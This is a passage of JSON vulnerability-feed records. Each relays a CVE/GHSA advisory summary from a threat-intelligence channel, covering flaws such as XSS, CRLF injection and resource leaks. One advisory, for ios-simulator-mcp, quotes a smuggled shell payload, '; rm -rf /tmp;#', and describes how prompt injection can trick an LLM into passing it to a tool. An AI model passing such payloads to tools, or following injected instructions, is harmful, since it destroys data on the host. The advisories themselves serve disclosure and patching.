https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "8bbacf14-71e4-4491-a3cc-bcc0f55c45f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6R77-HQX7-7VW8", "type": "seen", "source": "Telegram/lUzHwqY45MH_oOS5UDHqr6saeA9vYjttsYdPIjT_NMATUwM", "content": "", "creation_timestamp": "2026-04-23T21:26:47.000000Z"}, {"uuid": "468220bc-b71d-47aa-8cc9-e86ff5fac686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6F7G-V4PP-R667", "type": "seen", "source": "Telegram/lUzHwqY45MH_oOS5UDHqr6saeA9vYjttsYdPIjT_NMATUwM", "content": "", "creation_timestamp": "2026-04-23T21:26:47.000000Z"}, {"uuid": "0ca16eb8-ea38-499e-aa3f-c508ad9fe13b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G68-4PXG-MW93", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19486", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52479\n\ud83d\udd25 CVSS Score: 7.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: HTTP.jl provides HTTP client and server functionality for Julia, and URIs.jl parses and works with Uniform Resource Identifiers (URIs). URIs.jl prior to version 1.6.0 and HTTP.jl prior to version 1.10.17 allows the construction of URIs containing CR/LF characters. If user input was not otherwise escaped or protected, this can lead to a CRLF injection attack. Users of HTTP.jl should upgrade immediately to HTTP.jl v1.10.17, and users of URIs.jl should upgrade immediately to URIs.jl v1.6.0. The check for valid URIs is now in the URI.jl package, and the latest version of HTTP.jl incorporates that fix. As a workaround, manually validate any URIs before passing them on to functions in this package.\n\ud83d\udccf Published: 2025-06-25T16:06:45.402Z\n\ud83d\udccf Modified: 2025-06-25T16:06:45.402Z\n\ud83d\udd17 References:\n1. https://github.com/JuliaWeb/HTTP.jl/security/advisories/GHSA-4g68-4pxg-mw93\n2. https://github.com/JuliaWeb/URIs.jl/pull/66", "creation_timestamp": "2025-06-25T16:47:44.000000Z"}, {"uuid": "0d8deee6-215c-4d8f-ad66-12c1c2068d55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2JG-5CP7-6WC7", "type": "seen", "source": "Telegram/vObnyALXsyXLFJkccB0eoKwgfsCPRSJ_aAgpRRcRjZAUW0s", "content": "", "creation_timestamp": "2026-04-23T21:25:56.000000Z"}, {"uuid": "08eb6a79-45a0-448d-ae55-41f4ade32629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJJC-GRPP-M655", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19429", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-41255\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N)\n\ud83d\udd39 Description: Cyberduck and Mountain Duck improperly handle TLS certificate pinning for untrusted certificates (e.g., self-signed), unnecessarily installing it to the Windows Certificate Store of the current user without any restrictions.\n\n\n\n\n\n\n\n\n\n\n\nThis issue affects Cyberduck through 9.1.6 and Mountain Duck through\u00a04.17.5.\n\ud83d\udccf Published: 2025-06-25T09:21:37.479Z\n\ud83d\udccf Modified: 2025-06-25T09:28:38.711Z\n\ud83d\udd17 References:\n1. https://github.com/sbaresearch/advisories/tree/public/2025/SBA-ADV-20250325-01_Cyberduck_Mountain_Duck_Certificate_Handling\n2. https://github.com/iterate-ch/cyberduck/security/advisories/GHSA-vjjc-grpp-m655", "creation_timestamp": "2025-06-25T09:47:39.000000Z"}, {"uuid": "2ef2c34b-bfcc-44ee-b2d4-19d1f0272898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JV8-H7QH-RF5P", "type": "seen", "source": "Telegram/vObnyALXsyXLFJkccB0eoKwgfsCPRSJ_aAgpRRcRjZAUW0s", "content": "", "creation_timestamp": "2026-04-23T21:25:56.000000Z"}, {"uuid": "83094e17-6422-4115-9033-6292c7df0ec5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRG9-QQQX-WC4H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19457", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-39515\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a Stored Cross-Site-Scripting (XSS) Vulnerability allows an authenticated user to poison data stored in the cacti's database. These data will be viewed by administrative cacti accounts and execute JavaScript code in the victim's browser at view-time. The script under `data_debug.php` displays data source related debugging information such as _data source paths, polling settings, meta-data on the data source_. _CENSUS_ found that an adversary that is able to configure a malicious data-source path, can deploy a stored XSS attack against any user that has privileges related to viewing the `data_debug.php` information. A user that possesses the _General Administration&gt;Sites/Devices/Data_ permissions can configure the data source path in _cacti_. This configuration occurs through `http:///cacti/data_sources.php`. This vulnerability has been addressed in version 1.2.25. Users are advised to upgrade. Users unable to update should manually filter HTML output.\n\ud83d\udccf Published: 2023-09-05T20:06:20.459Z\n\ud83d\udccf Modified: 2025-06-25T14:25:57.089Z\n\ud83d\udd17 References:\n1. https://github.com/Cacti/cacti/security/advisories/GHSA-hrg9-qqqx-wc4h\n2. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/\n5. https://www.debian.org/security/2023/dsa-5550\n6. https://lists.debian.org/debian-lts-announce/2024/03/msg00018.html", "creation_timestamp": "2025-06-25T14:51:26.000000Z"}, {"uuid": "42f95d10-a502-4ba6-818a-5f249107746e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-26P5-MJJH-WFCF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19462", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48954\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Discourse is an open-source discussion platform. Versions prior to 3.5.0.beta6 are vulnerable to cross-site scripting when the content security policy isn't enabled when using social logins. Version 3.5.0.beta6 patches the issue. As a workaround, have the content security policy enabled.\n\ud83d\udccf Published: 2025-06-25T14:02:46.515Z\n\ud83d\udccf Modified: 2025-06-25T14:19:13.945Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-26p5-mjjh-wfcf", "creation_timestamp": "2025-06-25T14:51:34.000000Z"}, {"uuid": "43d1fc3e-10ba-4a5e-915f-4c08dc863f67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V92G-XGXW-VVMM", "type": "published-proof-of-concept", "source": "Telegram/wY3PGk1V7kusFG8GbDK0g0CtGhXXIm9U_sDC-frBku-7BiY", "content": "", "creation_timestamp": "2026-04-23T21:26:07.000000Z"}, {"uuid": "69cd8d44-72ab-489d-a243-b23d473637d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CJCX-JFP2-F7M2", "type": "published-proof-of-concept", "source": "Telegram/wY3PGk1V7kusFG8GbDK0g0CtGhXXIm9U_sDC-frBku-7BiY", "content": "", "creation_timestamp": "2026-04-23T21:26:07.000000Z"}, {"uuid": "5c633dcf-86c1-4812-9ca5-e6b5e39bf50a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5R37-QPWQ-2JHH", "type": "published-proof-of-concept", "source": "Telegram/wY3PGk1V7kusFG8GbDK0g0CtGhXXIm9U_sDC-frBku-7BiY", "content": "", "creation_timestamp": "2026-04-23T21:26:07.000000Z"}, {"uuid": "27a3785e-9563-4b94-832f-5e28f13b2354", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PX9R-875R-W534", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19463", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48991\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. An attacker could use a vulnerability present in Tuleap Community Edition prior to version 16.8.99.1748845907 and Tuleap Enterprise Edition prior to versions 16.8-3 and 16.7-5 to trick victims into changing the canned responses. Tuleap Community Edition 16.8.99.1748845907, Tuleap Enterprise Edition 16.8-3, and Tuleap Enterprise Edition 16.7-5 contain a fix for the vulnerability.\n\ud83d\udccf Published: 2025-06-25T14:07:47.416Z\n\ud83d\udccf Modified: 2025-06-25T14:16:19.378Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-px9r-875r-w534\n2. https://github.com/Enalean/tuleap/commit/cbf9b2a38e33dfd755dc2ccf074126b598a78274\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=cbf9b2a38e33dfd755dc2ccf074126b598a78274\n4. https://tuleap.net/plugins/tracker/?aid=43326", "creation_timestamp": "2025-06-25T14:51:35.000000Z"}, {"uuid": "110a3a70-6d00-4917-91bd-9a7f880bbf0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X4MJ-7F9G-29H4", "type": "published-proof-of-concept", "source": "Telegram/wY3PGk1V7kusFG8GbDK0g0CtGhXXIm9U_sDC-frBku-7BiY", "content": "", "creation_timestamp": "2026-04-23T21:26:07.000000Z"}, {"uuid": "4447b6e2-1631-4876-8505-2a8ea814704e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X8M-83VC-6WV4", "type": "seen", "source": "Telegram/lUzHwqY45MH_oOS5UDHqr6saeA9vYjttsYdPIjT_NMATUwM", "content": "", "creation_timestamp": "2026-04-23T21:26:47.000000Z"}, {"uuid": "0e36b7e7-33a6-4430-a712-eeb58dda2603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8Q4H-8CRM-5CVC", "type": "published-proof-of-concept", "source": "Telegram/wY3PGk1V7kusFG8GbDK0g0CtGhXXIm9U_sDC-frBku-7BiY", "content": "", "creation_timestamp": "2026-04-23T21:26:07.000000Z"}, {"uuid": "739d33f5-03a1-440f-a747-6dbc8e0a76c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63XR-98VC-WHX5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19468", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-57708\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue in OneTrust SDK v.6.33.0 allows a local attacker to cause a denial of service via the Object.setPrototypeOf, __proto__, and Object.assign components\n\ud83d\udccf Published: 2025-06-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-06-25T15:18:27.128Z\n\ud83d\udd17 References:\n1. https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js\n2. https://github.com/brotheralameen1/Discordforschool/security/advisories/GHSA-63xr-98vc-whx5", "creation_timestamp": "2025-06-25T15:52:14.000000Z"}, {"uuid": "1fd932b0-c8a6-4142-bb79-a39eaf508a56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJV3-89HH-9XQ2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19397", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52884\n\ud83d\udd25 CVSS Score: 1.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: RISC Zero is a zero-knowledge verifiable general computing platform, with Ethereum integration. The risc0-ethereum repository contains Solidity verifier contracts, Steel EVM view call library, and supporting code. Prior to versions 2.1.1 and 2.2.0, the `Steel.validateCommitment` Solidity library function will return `true` for a crafted commitment with a digest value of zero. This violates the semantics of `validateCommitment`, as this does not commitment to a block that is in the current chain. Because the digest is zero, it does not correspond to any block and there exist no known openings. As a result, this commitment will never be produced by a correct zkVM guest using Steel and leveraging this bug to compromise the soundness of a program using Steel would require a separate bug or misuse of the Steel library, which is expected to be used to validate the root of state opening proofs. A fix has been released as part of `risc0-ethereum` 2.1.1 and 2.2.0. Users for the `Steel` Solidity library versions 2.1.0 or earlier should ensure they are using `Steel.validateCommitment` in tandem with zkVM proof verification of a Steel program, as shown in the ERC-20 counter example, and documentation. This is the correct usage of Steel, and users following this pattern are not at risk, and do not need to take action. Users not verifying a zkVM proof of a Steel program should update their application to do so, as this is incorrect usage of Steel.\n\ud83d\udccf Published: 2025-06-24T20:20:17.287Z\n\ud83d\udccf Modified: 2025-06-24T20:20:17.287Z\n\ud83d\udd17 References:\n1. https://github.com/risc0/risc0-ethereum/security/advisories/GHSA-gjv3-89hh-9xq2\n2. https://github.com/risc0/risc0-ethereum/pull/605\n3. https://github.com/risc0/risc0-ethereum/commit/3bbac859c7132b21ba5fdf2d47f1dd52e7e73d98\n4. https://docs.beboundless.xyz/developers/steel/how-it-works#verifying-the-proof-onchain\n5. https://github.com/risc0/risc0-ethereum/blob/ff0cb9253a87945b653b825711b8b5075f8b7545/examples/erc20-counter/contracts/src/Counter.sol#L56-L63\n6. https://github.com/risc0/risc0-ethereum/releases/tag/v2.1.1\n7. https://github.com/risc0/risc0-ethereum/releases/tag/v2.2.0", "creation_timestamp": "2025-06-24T20:47:48.000000Z"}, {"uuid": "192880d8-f768-4b63-9e0c-7530c98e18ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9F65-56V6-GXW7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19405", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52882\n\ud83d\udd25 CVSS Score: 8.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N)\n\ud83d\udd39 Description: Claude Code is an agentic coding tool. Claude Code extensions in VSCode and forks (e.g., Cursor, Windsurf, and VSCodium) and JetBrains IDEs (e.g., IntelliJ, Pycharm, and Android Studio) are vulnerable to unauthorized websocket connections from an attacker when visiting attacker-controlled webpages. Claude Code for VSCode IDE extensions versions 0.2.116 through 1.0.23 are vulnerable. For Jetbrains IDE plugins, Claude Code [beta] versions 0.1.1 through 0.1.8 are vulnerable. In VSCode (and forks), exploitation would allow an attacker to read arbitrary files, see the list of files open in the IDE, get selection and diagnostics events from the IDE, or execute code in limited situations where a user has an open Jupyter Notebook and accepts a malicious prompt. In JetBrains IDEs, an attacker could get selection events, a list of open files, and a list of syntax errors. Claude released a patch for this issue on June 13th, 2025. Although Claude Code auto-updates when a user launch it and auto-updates the extensions, users should take the following steps, though the exact steps depend on one's integrated development environment (IDE). For VSCode, Cursor, Windsurf, VSCodium, and other VSCode forks, check the extension Claude Code for VSCode. Open the list of Extensions (View-&gt;Extensions), look for Claude Code for VSCode among installed extensions, update or uninstall any version prior to 1.0.24, and restart the IDE. For JetBrains IDEs including IntelliJ, PyCharm, and Android Studio, check the plugin Claude Code [Beta]. Open the Plugins list, look for Claude Code [Beta] among installed extensions, update or uninstall any version prior to 0.1.9, and restart the IDE.\n\ud83d\udccf Published: 2025-06-24T20:01:49.595Z\n\ud83d\udccf Modified: 2025-06-24T20:01:49.595Z\n\ud83d\udd17 References:\n1. https://github.com/anthropics/claude-code/security/advisories/GHSA-9f65-56v6-gxw7", "creation_timestamp": "2025-06-24T20:48:02.000000Z"}, {"uuid": "8d512c8a-d811-44f7-be05-19890f985a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6F6R-M9PV-67JW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19640", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52573\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:H)\n\ud83d\udd39 Description: iOS Simulator MCP Server (ios-simulator-mcp) is a Model Context Protocol (MCP) server for interacting with iOS simulators. Versions prior to 1.3.3 are written in a way that is vulnerable to command injection vulnerability attacks as part of some of its MCP Server tool definition and implementation. The MCP Server exposes the tool `ui_tap` which relies on Node.js child process API `exec` which is an unsafe and vulnerable API if concatenated with untrusted user input. LLM exposed user input for `duration`, `udid`, and `x` and `y` args can be replaced with shell meta-characters like `;` or `&amp;&amp;` or others to change the behavior from running the expected command `idb` to another command. When LLMs are tricked through prompt injection (and other techniques and attack vectors) to call the tool with input that uses special shell characters such as `; rm -rf /tmp;#` and other payload variations, the full command-line text will be interepted by the shell and result in other commands except of `ps` executing on the host running the MCP Server. Version 1.3.3 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-26T14:08:56.100Z\n\ud83d\udccf Modified: 2025-06-26T17:37:56.901Z\n\ud83d\udd17 References:\n1. https://github.com/joshuayoes/ios-simulator-mcp/security/advisories/GHSA-6f6r-m9pv-67jw\n2. https://github.com/joshuayoes/ios-simulator-mcp/commit/eb53a4f2cc8bbeb13e8d6d930f00167befcdb809\n3. https://github.com/joshuayoes/ios-simulator-mcp/blob/main/src/index.ts#L166-L207\n4. https://github.com/joshuayoes/ios-simulator-mcp/releases/tag/v1.3.3", "creation_timestamp": "2025-06-26T17:50:55.000000Z"}, {"uuid": "643c3fab-fc34-415c-a494-68485b768940", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC8W-H2MF-HP59", "type": "published-proof-of-concept", "source": "Telegram/tS2ffuiIBjg-jG5ou8TlrNJjBU2OGhcKfhZwclhyaQjd_Hg", "content": "", "creation_timestamp": "2026-04-23T21:25:36.000000Z"}, {"uuid": "9893ca5a-c0ae-4861-ac28-e9b9d3354d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9583", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "df8e7c17-2188-47c2-bf01-f2bf896b0997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1676", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19413", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-06-25T00:32:58.709Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/errata/RHSA-2024:4884\n12. https://access.redhat.com/errata/RHSA-2025:4226\n13. https://access.redhat.com/errata/RHSA-2025:9583\n14. https://access.redhat.com/security/cve/CVE-2024-1635\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-06-25T00:49:28.000000Z"}, {"uuid": "1b6c2c8f-48c7-4b2f-ab8e-04943b215c84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJ2R-455P-5GVF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19606", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52900\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. The file access permissions for files uploaded to or created from File Browser are never explicitly set by the application. The same is true for the database used by File Browser. On standard servers using File Browser prior to version 2.33.7 where the umask configuration has not been hardened before, this makes all the stated files readable by any operating system account. Version 2.33.7 fixes the issue.\n\ud83d\udccf Published: 2025-06-26T14:35:50.452Z\n\ud83d\udccf Modified: 2025-06-26T14:43:33.640Z\n\ud83d\udd17 References:\n1. https://github.com/filebrowser/filebrowser/security/advisories/GHSA-jj2r-455p-5gvf\n2. https://github.com/filebrowser/filebrowser/commit/ca86f916216620365c0f81629c0934ce02574d76", "creation_timestamp": "2025-06-26T14:51:56.000000Z"}, {"uuid": "de3046fd-f59b-43ee-9878-a6da00846220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WX8-5GM2-2J97", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19609", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52902\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. The Markdown preview function of File Browser prior to v2.33.7 is vulnerable to Stored Cross-Site-Scripting (XSS). Any JavaScript code that is part of a Markdown file uploaded by a user will be executed by the browser. Version 2.33.7 contains a fix for the issue.\n\ud83d\udccf Published: 2025-06-26T14:37:45.905Z\n\ud83d\udccf Modified: 2025-06-26T14:37:45.905Z\n\ud83d\udd17 References:\n1. https://github.com/filebrowser/filebrowser/security/advisories/GHSA-4wx8-5gm2-2j97\n2. https://github.com/filebrowser/filebrowser/commit/f19943a42e8e092e811dffbe9f4623dac36f1f0d", "creation_timestamp": "2025-06-26T14:51:59.000000Z"}, {"uuid": "ffc47876-be9a-4944-b61c-80a56d703e0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9Q7C-QMHM-JV86", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19498", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52889\n\ud83d\udd25 CVSS Score: 3.4 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:L)\n\ud83d\udd39 Description: Incus is a system container and virtual machine manager. When using an ACL on a device connected to a bridge, Incus version 6.12 and 6.13 generates nftables rules for local services (DHCP, DNS...) that partially bypass security options `security.mac_filtering`, `security.ipv4_filtering` and `security.ipv6_filtering`. This can lead to DHCP pool exhaustion and opens the door for other attacks. A patch is available at commit 2516fb19ad8428454cb4edfe70c0a5f0dc1da214.\n\ud83d\udccf Published: 2025-06-25T16:49:00.442Z\n\ud83d\udccf Modified: 2025-06-25T16:49:00.442Z\n\ud83d\udd17 References:\n1. 